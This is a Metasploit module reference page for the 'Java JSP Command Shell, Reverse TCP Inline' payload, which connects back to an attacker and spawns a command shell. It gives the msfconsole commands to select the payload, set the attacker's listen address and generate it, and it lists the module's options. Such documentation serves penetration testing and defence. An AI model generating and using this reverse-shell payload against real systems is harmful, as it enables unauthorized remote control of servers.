Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Open Source Vulnerability DataBase ID
Bugtraq ID
Full Text Search
Common Vulnerabilities Exposures ID
Microsoft Security Bulletin ID
 
Search Modules

Java JSP Command Shell, Reverse TCP Inline

Connect back to attacker and spawn a command shell


Rank

  • Normal

Authors

  • sf < stephen_fewer [at] harmonysecurity.com >

Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/java/jsp_shell_reverse_tcp
msf payload(jsp_shell_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(jsp_shell_reverse_tcp) > generate


Module Options

LHOST The listen address
LPORT The listen port (default: 4444)
SHELL The system shell to use. (default: cmd.exe)
AutoRunScript A script to run automatically on session creation.
InitialAutoRunScript An initial script to run on session creation (before AutoRunScript)
ReverseConnectRetries The number of connection attempts to try before exiting the process
ReverseListenerBindAddress The specific IP address to bind to on the local system
ReverseListenerComm The specific communication channel to use for this listener
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module